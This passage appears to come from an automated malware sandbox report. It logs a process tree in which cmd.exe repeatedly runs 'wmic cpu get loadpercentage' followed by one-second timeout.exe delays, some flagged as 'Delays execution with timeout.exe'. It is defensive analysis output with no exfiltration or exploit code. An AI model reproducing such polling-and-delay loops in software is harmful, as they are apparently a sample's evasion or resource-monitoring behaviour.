      PID:2060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4036
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:692
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3580
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2256
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1016
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3940
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2800
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3952
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2736
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4820
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1776
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4896
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2952
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:68
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2548
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4160
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3696
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1876
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1852
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4820
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1576
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3016
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3028
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2568
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5068
- - C:\Windows\system32\timeout.exe
